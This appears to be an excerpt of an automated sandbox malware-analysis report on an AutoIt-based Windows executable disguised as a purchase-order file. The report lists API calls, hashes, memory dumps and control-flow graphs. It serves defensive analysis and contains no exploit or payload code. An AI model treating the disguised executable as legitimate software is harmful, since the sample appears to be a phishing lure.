                        • Opcode ID: d0acf273f4d1e9e142545bb6f8aa9a5f9d89871d197cd5daa812847884e81287
                        • Instruction ID: 4813886144ebfc6195f3b017ef6389dbb83c8f44dd9939880f12130134462127
                        • Opcode Fuzzy Hash: d0acf273f4d1e9e142545bb6f8aa9a5f9d89871d197cd5daa812847884e81287
                        • Instruction Fuzzy Hash: 79515C36614244BBCB23EBB4EC47FEE7B7C9B05790F004056F64596192CB704AA5CF62

                        Control-flow Graph

                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e9983a6fedb05df54f642b46a876fbc4003a29133633ef3ec3c07deda4b5a5cc
                        • Instruction ID: f2634f9f22bd70fbdcd4ca67a6daa57ee1c5171b15f0d1d97383b7eadd2c6262
                        • Opcode Fuzzy Hash: e9983a6fedb05df54f642b46a876fbc4003a29133633ef3ec3c07deda4b5a5cc
                        • Instruction Fuzzy Hash: 58326E75B2222A8FDB258F14DC806E9B7B9FB46310F5440DAE40AE7B81D7709E90CF52

                        Control-flow Graph

                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 002CE4A7
                          • Part of subcall function 002B7E53: _memmove.LIBCMT ref: 002B7EB9
                        • GetCurrentProcess.KERNEL32(00000000,0034DC28,?,?), ref: 002CE567
                        • GetNativeSystemInfo.KERNEL32(?,0034DC28,?,?), ref: 002CE5BC
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 002CE5C7
                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 002CE5DA
                        • GetSystemInfo.KERNEL32(?,0034DC28,?,?), ref: 002CE5E4
                        • GetSystemInfo.KERNEL32(?,0034DC28,?,?), ref: 002CE5F0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                        • String ID:
                        • API String ID: 2717633055-0
                        • Opcode ID: dc033bc670f8ca599038a89d234a42538c289806c74743033095dec28814c0d1
                        • Instruction ID: ed8ec1df2323fd32db20463d4f4d2bcfdcf2667f82d545e85f67d659d886d86e
                        • Opcode Fuzzy Hash: dc033bc670f8ca599038a89d234a42538c289806c74743033095dec28814c0d1
                        • Instruction Fuzzy Hash: C461E2B18293D0DFCF16CF68A8C06EA7FA46F2A304F5A46DCD8449B207D624C958CF65

                        Control-flow Graph

                        APIs
                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 002B3202
                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 002B3219
                        • LoadResource.KERNEL32(?,00000000), ref: 003257D7
                        • SizeofResource.KERNEL32(?,00000000), ref: 003257EC
                        • LockResource.KERNEL32(?), ref: 003257FF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                        • String ID: SCRIPT
                        • API String ID: 3051347437-3967369404
                        • Opcode ID: 8f535a291980fc09fb41d94de8536aed84906e134bcb28832248ae8278485c61
                        • Instruction ID: 8be59419b186d0c3b1fa8d409db38139c074b8b49438dffa9fd8a4c3bbe7a0ba
                        • Opcode Fuzzy Hash: 8f535a291980fc09fb41d94de8536aed84906e134bcb28832248ae8278485c61
                        • Instruction Fuzzy Hash: B8115A74210705AFE7228B65EC89F677BBDEBC9B41F108428B842D6150DB71DD108A60
                        APIs
                        • GetFileAttributesW.KERNEL32(002BC848,002BC848), ref: 002CDDA2
                        • FindFirstFileW.KERNEL32(002BC848,?), ref: 00324A83
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$AttributesFindFirst
                        • String ID:
                        • API String ID: 4185537391-0
                        • Opcode ID: 781456b75138e1c8a531807324e8b1c432541fc4b91960da5f7b0c488f0c4247
                        • Instruction ID: 2fec3a12e1fcbd98dcf863432fcc146ea5af266b739d2329de3db57ef1e4cccd
                        • Opcode Fuzzy Hash: 781456b75138e1c8a531807324e8b1c432541fc4b91960da5f7b0c488f0c4247
                        • Instruction Fuzzy Hash: 56E04832C245156742156778FC4D8E9775C9A45339F100719F876C11F0E7B09D5495D6
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002BE279
                        • timeGetTime.WINMM ref: 002BE51A
                        • TranslateMessage.USER32(?), ref: 002BE646
                        • DispatchMessageW.USER32(?), ref: 002BE651
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002BE664
                        • LockWindowUpdate.USER32(00000000), ref: 002BE697
                        • DestroyWindow.USER32 ref: 002BE6A3
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002BE6BD
                        • Sleep.KERNEL32(0000000A), ref: 00325B15
                        • TranslateMessage.USER32(?), ref: 003262AF
                        • DispatchMessageW.USER32(?), ref: 003262BD
                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003262D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                        • API String ID: 2641332412-570651680
                        • Opcode ID: 437f04154c5abbcf96b367a8e55e4cac383013b04760b5a99995f1ea9564f939
                        • Instruction ID: 1517caa7666c2a24e455eaa6a17d0c67978a85e2490062344ff8a20853d501c7
                        • Opcode Fuzzy Hash: 437f04154c5abbcf96b367a8e55e4cac383013b04760b5a99995f1ea9564f939
                        • Instruction Fuzzy Hash: C6620070518340DFDB26DF24D885BEA77E8BF44344F05496DF94A8B292DBB0E898CB52
                        APIs
                        • ___createFile.LIBCMT ref: 002E6C73
                        • ___createFile.LIBCMT ref: 002E6CB4
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002E6CDD
                        • __dosmaperr.LIBCMT ref: 002E6CE4
                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002E6CF7
                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002E6D1A
                        • __dosmaperr.LIBCMT ref: 002E6D23
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002E6D2C
                        • __set_osfhnd.LIBCMT ref: 002E6D5C
                        • __lseeki64_nolock.LIBCMT ref: 002E6DC6
                        • __close_nolock.LIBCMT ref: 002E6DEC
                        • __chsize_nolock.LIBCMT ref: 002E6E1C
                        • __lseeki64_nolock.LIBCMT ref: 002E6E2E
                        • __lseeki64_nolock.LIBCMT ref: 002E6F26
                        • __lseeki64_nolock.LIBCMT ref: 002E6F3B
                        • __close_nolock.LIBCMT ref: 002E6F9B
                          • Part of subcall function 002DF84C: CloseHandle.KERNEL32(00000000,0035EEC4,00000000,?,002E6DF1,0035EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002DF89C
                          • Part of subcall function 002DF84C: GetLastError.KERNEL32(?,002E6DF1,0035EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002DF8A6
                          • Part of subcall function 002DF84C: __free_osfhnd.LIBCMT ref: 002DF8B3
                          • Part of subcall function 002DF84C: __dosmaperr.LIBCMT ref: 002DF8D5
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • __lseeki64_nolock.LIBCMT ref: 002E6FBD
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002E70F2
                        • ___createFile.LIBCMT ref: 002E7111
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002E711E
                        • __dosmaperr.LIBCMT ref: 002E7125
                        • __free_osfhnd.LIBCMT ref: 002E7145
                        • __invoke_watson.LIBCMT ref: 002E7173
                        • __wsopen_helper.LIBCMT ref: 002E718D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                        • String ID: 9A-$@
                        • API String ID: 3896587723-4263143223
                        • Opcode ID: 49ca7a5c03424173edafedfef587d4ad705a26ca0c74adbef2d2db8344fddb73
                        • Instruction ID: bb8132aa1b1bfd4393f57a2fa8981225ea2fc6404ad01dcce6c4338fc4dd3fc4
                        • Opcode Fuzzy Hash: 49ca7a5c03424173edafedfef587d4ad705a26ca0c74adbef2d2db8344fddb73
                        • Instruction Fuzzy Hash: 14228A31D602879BEF258F6ADC59BAD7B60EF20364FA84229E511EB2D1C7358D70CB50

                        Control-flow Graph

                        APIs
                        • _wcscpy.LIBCMT ref: 0030026A
                        • _wcschr.LIBCMT ref: 00300278
                        • _wcscpy.LIBCMT ref: 0030028F
                        • _wcscat.LIBCMT ref: 0030029E
                        • _wcscat.LIBCMT ref: 003002BC
                        • _wcscpy.LIBCMT ref: 003002DD
                        • __wsplitpath.LIBCMT ref: 003003BA
                        • _wcscpy.LIBCMT ref: 003003DF
                        • _wcscpy.LIBCMT ref: 003003F1
                        • _wcscpy.LIBCMT ref: 00300406
                        • _wcscat.LIBCMT ref: 0030041B
                        • _wcscat.LIBCMT ref: 0030042D
                        • _wcscat.LIBCMT ref: 00300442
                          • Part of subcall function 002FC890: _wcscmp.LIBCMT ref: 002FC92A
                          • Part of subcall function 002FC890: __wsplitpath.LIBCMT ref: 002FC96F
                          • Part of subcall function 002FC890: _wcscpy.LIBCMT ref: 002FC982
                          • Part of subcall function 002FC890: _wcscat.LIBCMT ref: 002FC995
                          • Part of subcall function 002FC890: __wsplitpath.LIBCMT ref: 002FC9BA
                          • Part of subcall function 002FC890: _wcscat.LIBCMT ref: 002FC9D0
                          • Part of subcall function 002FC890: _wcscat.LIBCMT ref: 002FC9E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                        • String ID: >>>AUTOIT SCRIPT<<<
                        • API String ID: 2955681530-2806939583
                        • Opcode ID: f3eac83307eeae14ba9f159d5ecce75033a14311ff4bc15335f6983f65cb6a57
                        • Instruction ID: 8d4f4567be3620d5f73dd67496cd8f23cf2d6c206b0ab31e45108096a3dc8f99
                        • Opcode Fuzzy Hash: f3eac83307eeae14ba9f159d5ecce75033a14311ff4bc15335f6983f65cb6a57
                        • Instruction Fuzzy Hash: 3791AE71514705AFCB25EB50C865FEAB3E8AF84310F04485EF5599B292EB30EA68CF52

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 002B2F8B
                        • RegisterClassExW.USER32(00000030), ref: 002B2FB5
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B2FC6
                        • InitCommonControlsEx.COMCTL32(?), ref: 002B2FE3
                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B2FF3
                        • LoadIconW.USER32(000000A9), ref: 002B3009
                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B3018
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3To
                        • API String ID: 2914291525-26617492
                        • Opcode ID: 5ed1c6c9fd1f530056f63e1ac59073648dce2dc194b6dfb8ea2ac85bce9d4fc9
                        • Instruction ID: 593c0cb3b844569bfb2f95024224b6038eac601ad392fa1bb23cd7bc2d653e77
                        • Opcode Fuzzy Hash: 5ed1c6c9fd1f530056f63e1ac59073648dce2dc194b6dfb8ea2ac85bce9d4fc9
                        • Instruction Fuzzy Hash: 9921B8B5910318AFDB12DFA9EC89BCEBBF8FB08704F10411AF515A62A0D7B54584CF91

                        Control-flow Graph

                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,00000000,00000001,00000000), ref: 002B428C
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                          • Part of subcall function 002D1BC7: __wcsicmp_l.LIBCMT ref: 002D1C50
                        • _wcscpy.LIBCMT ref: 002B43C0
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 0032214E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\PO 09110124 EXPRESS SYSTEM-SESB24066.exe$CMDLINE$CMDLINERAW
                        • API String ID: 861526374-2720470740
                        • Opcode ID: ba2bf24e58893386554c65626c56b41af4c0534c7ea2f5138334b2b016ebd201
                        • Instruction ID: 53dadb6fedcd11d463823a33763020e1fab485bf1a3a4fcb5feb8b8cbfdea531
                        • Opcode Fuzzy Hash: ba2bf24e58893386554c65626c56b41af4c0534c7ea2f5138334b2b016ebd201
                        • Instruction Fuzzy Hash: 4B819472920119AACB15EBE4DC92EEFB7BCEF05390F600016F545B7092EF606A64CF61

                        Control-flow Graph

                        APIs
                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 002CEA39
                        • __wsplitpath.LIBCMT ref: 002CEA56
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcsncat.LIBCMT ref: 002CEA69
                        • __makepath.LIBCMT ref: 002CEA85
                          • Part of subcall function 002D2BFF: __wmakepath_s.LIBCMT ref: 002D2C13
                          • Part of subcall function 002D010A: std::exception::exception.LIBCMT ref: 002D013E
                          • Part of subcall function 002D010A: __CxxThrowException@8.LIBCMT ref: 002D0153
                        • _wcscpy.LIBCMT ref: 002CEABE
                          • Part of subcall function 002CEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,002CEADA,?,?), ref: 002CEB27
                        • _wcscat.LIBCMT ref: 003232FC
                        • _wcscat.LIBCMT ref: 00323334
                        • _wcsncpy.LIBCMT ref: 00323370
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                        • String ID: Include$\$"7
                        • API String ID: 1213536620-3415774452
                        • Opcode ID: f30f0464bfb78b9b7d10cfeec642bcf38f00bf3fb403aea8012e47eb342d0557
                        • Instruction ID: ab0130219678f34e1c271388c37c48acd2220fb64d0a1c6aaa24cce378459bd3
                        • Opcode Fuzzy Hash: f30f0464bfb78b9b7d10cfeec642bcf38f00bf3fb403aea8012e47eb342d0557
                        • Instruction Fuzzy Hash: 89516CB94143409BE326EF54EC85C9BB7ECFB48300F40491EF54987261EB749A98CF66

                        Control-flow Graph

                        control_flow_graph 993 2fc890-2fc940 call 2e0650 call 2d010a call 2b4bce call 2fc6a0 call 2b41a7 call 2d2203 1006 2fc946-2fc94d call 2fce59 993->1006 1007 2fc9f3-2fc9fa call 2fce59 993->1007 1012 2fc9fc-2fc9fe 1006->1012 1013 2fc953-2fc9f1 call 2d297d call 2d1943 call 2d1914 call 2d297d call 2d1914 * 2 1006->1013 1007->1012 1014 2fca03 1007->1014 1015 2fcc53-2fcc54 1012->1015 1017 2fca06-2fcac2 call 2b417d * 8 call 2fd009 call 2d4129 1013->1017 1014->1017 1018 2fcc71-2fcc7f call 2b4fd2 1015->1018 1052 2fcacb-2fcae6 call 2fc6e4 1017->1052 1053 2fcac4-2fcac6 1017->1053 1056 2fcaec-2fcaf4 1052->1056 1057 2fcb78-2fcb84 call 2d4274 1052->1057 1053->1015 1058 2fcafc 1056->1058 1059 2fcaf6-2fcafa 1056->1059 1064 2fcb9a-2fcb9e 1057->1064 1065 2fcb86-2fcb95 DeleteFileW 1057->1065 1061 2fcb01-2fcb1f call 2b417d 1058->1061 1059->1061 1071 2fcb49-2fcb5f call 2fc07d call 2d373e 1061->1071 1072 2fcb21-2fcb27 1061->1072 1067 2fcc2e-2fcc42 CopyFileW 1064->1067 1068 2fcba4-2fcc1b call 2fd10c call 2fd134 call 2fc251 1064->1068 1065->1015 1069 2fcc56-2fcc6c DeleteFileW call 2fcfc8 1067->1069 1070 2fcc44-2fcc51 DeleteFileW 1067->1070 1068->1069 1089 2fcc1d-2fcc2c DeleteFileW 1068->1089 1069->1018 1070->1015 1084 2fcb64-2fcb6f 1071->1084 1075 2fcb29-2fcb3c call 2fc81a 1072->1075 1085 2fcb3e-2fcb47 1075->1085 1084->1056 1087 2fcb75 1084->1087 1085->1071 1087->1057 1089->1015
                        APIs
                          • Part of subcall function 002FC6A0: __time64.LIBCMT ref: 002FC6AA
                          • Part of subcall function 002B41A7: _fseek.LIBCMT ref: 002B41BF
                        • __wsplitpath.LIBCMT ref: 002FC96F
                          • Part of subcall function 002D297D: __wsplitpath_helper.LIBCMT ref: 002D29BD
                        • _wcscpy.LIBCMT ref: 002FC982
                        • _wcscat.LIBCMT ref: 002FC995
                        • __wsplitpath.LIBCMT ref: 002FC9BA
                        • _wcscat.LIBCMT ref: 002FC9D0
                        • _wcscat.LIBCMT ref: 002FC9E3
                          • Part of subcall function 002FC6E4: _memmove.LIBCMT ref: 002FC71D
                          • Part of subcall function 002FC6E4: _memmove.LIBCMT ref: 002FC72C
                        • _wcscmp.LIBCMT ref: 002FC92A
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF49
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF5C
                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002FCB8D
                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002FCC24
                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002FCC3A
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002FCC4B
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002FCC5D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                        • String ID:
                        • API String ID: 152968663-0
                        • Opcode ID: e87482f14c17decd2d2be382f61bb46cb02361972234ecb134ef2c5cf359beea
                        • Instruction ID: fb5fe299cbc8e94ffab40692d3af9792d1c51a45433f2007dd0058b12da7be1d
                        • Opcode Fuzzy Hash: e87482f14c17decd2d2be382f61bb46cb02361972234ecb134ef2c5cf359beea
                        • Instruction Fuzzy Hash: 6EC13AB1D1012DAACF11DFA5CD81EEEB7BDAF48350F1040AAF609E6251DB709A94CF61

                        Control-flow Graph

                        control_flow_graph 1090 2b29c2-2b29e2 1092 2b2a42-2b2a44 1090->1092 1093 2b29e4-2b29e7 1090->1093 1092->1093 1096 2b2a46 1092->1096 1094 2b29e9-2b29f0 1093->1094 1095 2b2a48 1093->1095 1097 2b2aac-2b2ab4 PostQuitMessage 1094->1097 1098 2b29f6-2b29fb 1094->1098 1100 322307-322335 call 2b322e call 2cec33 1095->1100 1101 2b2a4e-2b2a51 1095->1101 1099 2b2a2b-2b2a33 DefWindowProcW 1096->1099 1105 2b2a72-2b2a74 1097->1105 1103 2b2a01-2b2a03 1098->1103 1104 32238f-3223a3 call 2f57fb 1098->1104 1106 2b2a39-2b2a3f 1099->1106 1135 32233a-322341 1100->1135 1107 2b2a53-2b2a54 1101->1107 1108 2b2a76-2b2a9d SetTimer RegisterWindowMessageW 1101->1108 1110 2b2a09-2b2a0e 1103->1110 1111 2b2ab6-2b2ac5 call 2b1e58 1103->1111 1104->1105 1129 3223a9 1104->1129 1105->1106 1114 2b2a5a-2b2a6d KillTimer call 2b2b94 call 2b2ac7 1107->1114 1115 3222aa-3222ad 1107->1115 1108->1105 1112 2b2a9f-2b2aaa CreatePopupMenu 1108->1112 1118 322374-32237b 1110->1118 1119 2b2a14-2b2a19 1110->1119 1111->1105 1112->1105 1114->1105 1122 3222e3-322302 MoveWindow 1115->1122 1123 3222af-3222b1 1115->1123 1118->1099 1125 322381-32238a call 2eb31f 1118->1125 1127 2b2a1f-2b2a25 1119->1127 1128 32235f-32236f call 2f5fdb 1119->1128 1122->1105 1131 3222d2-3222de SetFocus 1123->1131 1132 3222b3-3222b6 1123->1132 1125->1099 1127->1099 1127->1135 1128->1105 1129->1099 1131->1105 1132->1127 1136 3222bc-3222cd call 2b322e 1132->1136 1135->1099 1140 322347-32235a call 2b2b94 call 2b3598 1135->1140 1136->1105 1140->1099
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?), ref: 002B2A33
                        • KillTimer.USER32(?,00000001), ref: 002B2A5D
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002B2A80
                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B2A8B
                        • CreatePopupMenu.USER32 ref: 002B2A9F
